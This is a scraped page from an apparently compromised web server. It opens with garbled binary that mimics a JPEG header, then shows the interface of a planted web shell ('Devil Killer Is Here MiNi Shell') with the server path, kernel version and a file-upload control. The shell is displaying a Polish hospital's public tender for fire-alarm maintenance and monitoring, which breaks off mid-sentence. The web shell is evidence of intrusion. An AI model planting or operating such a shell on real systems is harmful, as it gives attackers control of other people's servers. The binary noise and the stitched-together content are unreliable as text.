JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220816/0030622401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Stała konserwacja systemu sygnalizacji pożaru wraz z monitoringiem Państwowej Straży Pożarnej i napraw nie wchodzących w zakres konserwacji obiektów szpitalnych Specjalistycznego Szpitala... </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Specjalistyczny Szpital im. dra Alfreda Sokołowskiego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890047446</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sokołowskiego 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wałbrzych</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-309</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">agnieszka.dziadkiewicz@zdrowie.walbrzych.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zdrowie.walbrzych.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Stała konserwacja systemu sygnalizacji pożaru wraz z monitoringiem Państwowej Straży Pożarnej i napraw nie wchodzących w zakres konserwacji obiektów szpitalnych Specjalistycznego Szpitala... </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-932895a4-1d46-11ed-acbd-46d0480cd9c4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00306224</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00064382/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Stała konserwacja systemu sygnalizacji p.poż wraz z monitoringiem KMPSP</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.zdrowie.walbrzych.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z „Obwieszczeniem Prezesa Rady Ministrów z dnia 9 listopada 2017r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”<br/>1.	Zamawiający rekomenduje wykorzystanie formatów : .pdf .doc .xls .xlsx .jpg (.jpeg) .rtf .odt ze szczególnym wskazaniem na .pdf.<br/>2.	W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów : .zip .7Z<br/>3.	Wśród formatów powszechnych a nie występujących w Rozporządzeniu występują : .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostną uznane za złożone nieskutecznie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Informujemy, że Administrator wyznaczył Inspektora Ochrony Danych Osobowych (IODO), kontakt możliwy jest za pośrednictwem e-mail: iodo@zdrowie.walbrzych.pl, numer (74) 6489600 oraz osobę zastępującą IODO, kontakt za pośrednictwem e-mail: iod@zdrowie.walbrzych.pl, numer (74) 6489696 lub korespondencyjnie na adres Administratora. <br/>2.	Celem przetwarzania danych osobowych jest wypełnienie obowiązków prawnych ciążących na <br/><br/>jednostkach sektora finansów publicznych, w tym na podmiocie leczniczym, w zakresie przeprowadzania postępowania o udzielenie zamówienia publicznego: „Stała konserwacja systemu sygnalizacji pożaru wraz z monitoringiem Państwowej Straży Pożarnej i napraw nie wchodzących w zakres konserwacji obiektów szpitalnych Specjalistycznego Szpitala im. dra A. Sokołowskiego przy ul. Batorego i Sokołowskiego w Wałbrzychu” - Zp/33/TP/22 na podstawie art. 4 pkt. 1 ustawy z dnia 11 września 2019r. Prawo zamówień publicznych (tj. Dz.U. z 2021 poz. 1129 z późn. zm.). Przesłanką legalizującą przetwarzanie tych danych osobowych na gruncie „RODO” jest art. 6 ust. 1 lit. c. W wyjątkowych przypadkach w tym samym celu będziemy również przetwarzać dane osobowe dotyczące wyroków skazujących lub naruszeń prawa na podstawie art. 108 ust. 1 w związku z art. 124 pkt. 1 cytowanej wyżej ustawy. Przesłanką legalizującą przetwarzanie tych danych osobowych na gruncie „RODO” jest art. 10.<br/>3.	Dane przekazane przez Panią/Pana będą podlegały udostępnieniu następującym kategoriom odbiorców: organy władzy publicznej, organy ścigania, inne uprawnione podmioty, w zakresie i celach, gdy występują z żądaniem w oparciu o stosowną podstawę prawną w tym np. Krajowa Izba Odwoławcza, inne podmioty, które świadczą usługi na rzecz administratora np. podmiotom świadczącym obsługę prawną, podmiotom, z którymi administrator zawarł umowę przetwarzania danych w imieniu administratora, serwisanci lub Poczta Polska.<br/>4.	Administrator nie ma zamiaru przekazywać danych osobowych do państwa trzeciego lub organizacji międzynarodowej.<br/>5.	Dane osobowe, wynikające ze zgromadzonej dokumentacji zamówienia wraz z załącznikami, będą przechowywane przez okres 4 lat licząc od dnia zakończenia postępowania o udzielenie zamówienia a w przypadku obowiązywania umowy w sprawie zamówienia publicznego powyżej 4 lat, przechowywana jest przez cały okres obowiązywania umowy w sprawie zamówienia publicznego. Jeżeli środki finansowe zostały pozyskane z funduszy europejskich wówczas taka dokumentacja będzie przechowywana przez okres wskazany w tych dokumentach przyznających te środki i mogą wynosić okresy dłuższe niż 4 lata. Po tym terminie dane będą protokolarnie niszczone.<br/>6.	Przysługuje Pani/Panu prawo dostępu do treści swoich danych oraz otrzymywania ich kopii, sprostowania ( poprawiania ) swoich danych osobowych, gdy są niezgodne ze stanem rzeczywistym. Prawo do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Prawo zamówień publicznych, w tym nie może naruszać integralności protokołu postępowania oraz jego załączników. Przysługuje również prawo żądania od administratora ograniczenia przetwarzania danych osobowych, o którym mowa w art. 18 ust. 1 „RODO”, nie może ono jednak ograniczać przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Zp/33/TP/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Stała konserwacja systemu sygnalizacji pożaru wraz z monitoringiem Państwowej Straży Pożarnej za cały okres trwania umowy (48 miesięcy).<br/>OPIS PRZEDMIOTU ZAMÓWIENIA<br/><br/>Monitoring sygnałów z systemów sygnalizacji pożaru do Państwowej Straży Pożarnej w Wałbrzychu, Wykonywanie przeglądów kwartalnych konserwacji oraz usuwanie awarii i naprawa systemów przeciwpożarowych zainstalowanych w obiektach szpitalnych położonych w Wałbrzychu przy ul. Sokołowskiego 4 i Batorego 4 przez okres 48 m-cy od 1 października 2022r.<br/><br/>1. W ramach usługi monitorowania pożarowego należy monitorować na obiektach szpitalnych Urządzenia Transmisji Alarmów - UTA i za ich pośrednictwem monitorowaniu drogą radiową oraz telefoniczną:<br/>a) sygnału głównego pożarowego i jego natychmiastową retransmisję na terminal zainstalowany w Komendzie Państwowej Straży Pożarnej w Wałbrzychu<br/>b) sygnału uszkodzenia centrali sygnalizacji pożaru,<br/>c) sygnału zaniku zasilania 230V na obiekcie,<br/>d) sygnału włamania do urządzenia transmisji alarmu UTA i przerwania połączenia pomiędzy UTA a centralką sygnalizacji pożaru,<br/>e) bezzwłocznym powiadamianiu, w sytuacjach alarmowych telefonicznie osób wyszczególnionych w załączniku nr 1.<br/>2. W ramach konserwacji systemu, która prowadzona będzie w systemie kwartalnym, zawsze w ostatnim miesiącu kwartału będzie obejmowała następujące czynności:<br/>Konserwacja Kwartalna:<br/>a)	Sprawdzenie wszystkich zapisów w książce eksploatacji i podjęcie niezbędnych działań, aby doprowadzić do prawidłowej pracy instalacji;<br/>b)	Sprawdzenie każdej czujki, wskaźnika zadziałania, sygnalizatora oraz ręcznego ostrzegacza na poprawność działania zgodnie z zaleceniami producenta, dopuszcza się sprawdzanie kolejnych 25% w/w elementów przy kolejnej kontroli kwartalnej. Spowodowanie zadziałania, co najmniej jednej czujki lub ręcznego ostrzegacza pożarowego w każdej strefie, w celu sprawdzenia czy SAP prawidłowo odbiera i wyświetla określone sygnały, eliminuje alarm akustyczny oraz uruchamia wszystkie inne urządzenia alarmowe i pomocnicze oraz spowodowała zadziałanie każdego łącza do straży pożarnej lub do zdalnego centrum alarmowego;<br/>c)	Sprawdzenie zdolności SAP do uaktywnienia wszystkich wyjść funkcji pomocniczych-sygnalizatory;<br/>d)	Przeprowadzenie testów wskaźników optycznych w centrali, a każdy fakt niesprawności jakiegoś wskaźnika zostanie odnotowany w książce eksploatacji;<br/>e)	Sprawdzenie wzrokowo, czy wszystkie połączenia kablowe i aparatura są sprawne, nieuszkodzone i odpowiednio zabezpieczone;<br/>f)	Sprawdzenie czy nadzorowanie uszkodzeń SAP funkcjonuje prawidłowo;<br/>g)	Dokonanie oględzin, w celu ustalenia, czy nastąpiły jakieś zmiany budowlane w budynku lub jego przeznaczeniu, które mogły wpłynąć na poprawność rozmieszczenia czujek i ręcznych ostrzegaczy pożarowych oraz urządzeń alarmowych, sprawdził także, czy pod każdą czujką jest utrzymana wolna przestrzeń co najmniej 0,5m we wszystkich kierunkach i czy wszystkie ręczne ostrzegacze pożarowe są dostępne i widoczne;<br/>h)	Sprawdzenie stanu wszystkich akumulatorów rezerwowych;<br/>i)	Każda zauważona nieprawidłowość będzie odnotowana w książce eksploatacji i możliwie szybko usunięta.<br/>1)	Pierwsza konserwacja kwartalna do końca grudnia 2022r.<br/>2)	Kwartał liczymy jako kwartał/rok obowiązywania umowy.<br/>3. Szczegółowy zakres wymaganych prac dla systemów alarmu pożarowego (SAP):<br/>1.	Prowadzenie przeglądu i konserwacji central sygnalizacji pożaru (CSP) oraz systemów sterujących urządzeń uaktywnianych przez CSP – w każdym obiekcie 1 raz na kwartał.<br/>2.	Sprawdzenie zdatności CSP do uaktywniania wszystkich funkcji pomocniczych np. sterowania klapami dymowymi, wentylatorami, drzwiami ewakuacyjnymi, itp. (jeśli takie występują w obiekcie) – w każdym obiekcie 1 raz na kwartał.<br/>3.	Sprawdzenie działania linii (pętli) dozorowych i sygnałowych – w każdym obiekcie 1 raz na kwartał.<br/>4.	Prowadzenie przeglądu i konserwacji układów zasilania (podstawowych i awaryjnych) instalacji sygnalizacji pożaru – w każdym obiekcie 1 raz na kwartał.<br/>5.	Prowadzenie przeglądu i konserwacji elementów zainstalowanych na liniach (pętlach) dozorowych i sygnałowych: czujek pożarowych, przycisków pożarowych (ROP), sygnalizatorów zadziałania (optycznych i akustycznych), modułów liniowych sterujących i monitorujących – w każdym obiekcie objąć przeglądem cały system.<br/>Zakres w/w prac konserwacyjnych w szczególności obejmuje:<br/>•	sprawdzenie stanu technicznego oraz mocowania przewodów linii (pętli) dozorowych i sygnałowych,<br/>•	sprawdzenie wszystkich części i urządzeń pod kątem ewentualnych uszkodzeń mechanicznych,<br/>•	sprawdzenie mocowania czujek pożarowych, przycisków pożarowych, sygnalizatorów zadziałania,<br/>•	sprawdzenie działania wszystkich przycisków pożarowych,<br/>•	sprawdzenie działania każdej linii (pętli) dozorowej i sygnałowej,<br/>•	sprawdzenie działania każdej czujki pożarowej zgodnie z zaleceniami producenta (za pomocą imitatora dymu, temperatury, itp.) oraz czyszczenie komór pomiarowych czujek (konieczne sporządzenie szczegółowego sprawozdania dołączonego każdorazowo do protokołu),<br/>•	wydrukowanie raportu z centrali ze stanu elementów zainstalowanych w danym systemie.<br/>•	wymiany części o ograniczonej żywotności (np. lampki, żarówki, bezpieczniki, szybki ochronne, itp.).<br/>4. Szczegółowy zakres wymaganych prac dla systemów odymiających:<br/>1.	Prowadzenie przeglądu i konserwacji urządzeń sterujących (centrale sterujące) instalacji oddymiających – w każdym obiekcie 1 raz na kwartał.<br/>2.	Prowadzenie przeglądu i konserwacji układów zasilania (podstawowych i awaryjnych) central odymiających – w każdym obiekcie 1 raz na kwartał.<br/>3.	Prowadzenie przeglądów technicznych i konserwacji elementów instalacji oddymiających: czujki dymowe, linie sterujące, przyciski oddymiania i przewietrzania, siłowniki, klapy, okna i drzwi napowietrzające wraz z przeprowadzeniem próby działania – w każdym obiekcie 1 raz na kwartał . <br/>4.	Prowadzenia przeglądów technicznych i konserwacji klap przeciwpożarowych klap dymowych odcinających w przewodach wentylacyjnych, klap szczelinowych w przedsionkach, żaluzji przeciwpożarowych w oknach (jeśli takie urządzenia występują w obiekcie) – 1 raz na kwartał.<br/>5.	W zakresie czynności i prac konserwacyjnych Wykonawca zobowiązany jest również do:<br/>•	regulacji urządzeń lub ich części,<br/>•	usunięcia zauważonych uszkodzeń linii (pętli) dozorowych i sygnałowych powstałych w czasie ich normalnej eksploatacji,<br/>•	uzupełnienia linek mocujących, uchwytów, mocowań, itp., wymiany części o ograniczonej żywotności (np. lampki, żarówki, bezpieczniki, szybki ochronne, itp.).<br/>5. Szczegółowy zakres wymaganych prac dla urządzeń transmisji alarmów pożarowych (UTA).<br/>1.	Prowadzenie przeglądu i konserwacji urządzeń transmisji alarmów pożarowych z łączami komutowanymi i radiowymi (UTA).<br/>2.	Sprawdzenie monitoringu systemu SAP i transmisja sygnałów pożarowych do stacji odbiorczej alarmów pożarowych (SOA).<br/>3.	Sprawdzenie automatycznej retransmisji sygnałów alarmowych z urządzenia odbiorczego SOA do urządzenia końcowego systemu transmisji alarmów pożarowych znajdującego się w alarmowym centrum odbiorczym Komendy Miejskiej Państwowej Straży Pożarnej w Wałbrzychu.<br/>4.	Instalacja urządzeń transmisji alarmów pożarowych z łączami komutowanymi <br/>i radiowymi w obiektach Zamawiającego objętych przedmiotem zamówienia oraz połączenie ich z urządzeniami sygnalizacji pożaru. Panele radiowe oraz komunikatory telefoniczne stanowią własność Wykonawcy, koszty związane z ich zakupem oraz montażem obciążają w całości Wykonawcę. Zamawiający po zakończeniu umowy wyda Wykonawcy urządzenia stanowiące jego własność.<br/>5.	Uruchomienie urządzeń transmisji alarmów pożarowych znajdujących się w obiektach, które stanowią własność Zamawiającego lub ich wymiana na urządzenia Wykonawcy <br/>(w przypadku braku możliwości ich wykorzystania w systemie transmisji stosowanym przez Wykonawcę) – obciąża w całości Wykonawcę.<br/>6.	Stałe monitorowanie systemów sygnalizacji pożarów oraz transmisja sygnałów alarmowych do stacji odbiorczej alarmów pożarowych.<br/>7.	Retransmitowanie sygnałów alarmów pożarowych do alarmowego centrum odbiorczego Komendy Miejskiej Państwowej Straży Pożarnej.<br/>8.	Stałe monitorowanie automatycznych alarmów defektów: systemów zasilania, paneli radiowych, komunikatorów telefonicznych oraz central systemów sygnalizacji pożarowej.<br/>9.	Prowadzenie przeglądu i konserwacji urządzeń transmisji alarmów pożarowych – <br/>w każdym obiekcie 1 raz na kwartał. W przypadku urządzeń stanowiących własność Wykonawcy koszty przeglądów i konserwacji nie obciążają Zamawiającego.<br/>10.	Wykonawca zapewnia podjęcie działań związanych z naprawą systemów transmisji w ciągu … godzin od otrzymania zgłoszenia o awarii i usunięcie awarii w czasie 24 godzin.<br/>11.	Naprawy urządzeń stanowiących własność Wykonawcy, wynikające z ich normalnej eksploatacji, nie obciążają Zamawiającego.<br/>6. Obowiązki Wykonawcy:<br/>1.	Wykonawca jest zobowiązany do wykonywania przeglądów i konserwacji w sposób zgodny z obowiązującymi normami, instrukcjami i zaleceniami producenta oraz do utrzymania konserwowanych systemów w pełnej sprawności, w sposób zapewniający zachowanie warunków posiadanej gwarancji.<br/>2.	Okresowe przeglądy i konserwacja systemów wraz z usuwaniem stwierdzonych w czasie przeglądu usterek oraz wymianą niesprawnych lub zużytych technicznie części będą wykonywane raz na 3 miesiące zgodnie z instrukcjami obsługi i konserwacji poszczególnych systemów.<br/>3.	Wykonawca winien potwierdzić przeprowadzenie przeglądu technicznego i konserwacji systemów nisko prądowych wpisem do książki pracy systemu oraz protokołem sporządzonym dla każdego obiektu, zawierającym następujące informacje:<br/>•	nazwę firmy,<br/>•	nazwę i adres obiektu, w którym przeprowadzono przegląd i konserwację,<br/>•	nazwisko i podpis konserwatora,<br/>•	rodzaj i zakres prowadzonego przeglądu technicznego,<br/>•	wykaz wszystkich sprawdzonych elementów każdego systemu,<br/>•	wynik przeprowadzonego przeglądu ze szczególnym uwzględnieniem: koniecznych do przeprowadzenia remontów wykraczających poza zakres zwykłej ... dalszy szczegółowy opis w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">75251110-4 - Usługi ochrony przeciwpożarowej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50700000-2 - Usługi w zakresie napraw i konserwacji instalacji budynkowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">48 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Stawka za 1 roboczo/godzinę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji od chwili zgłoszenia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O zamówienie mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu zgodnie z art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp,<br/>2)	nie podlegają wykluczeniu zgodnie z art. 7 ust. 1 ustawy z dnia 13 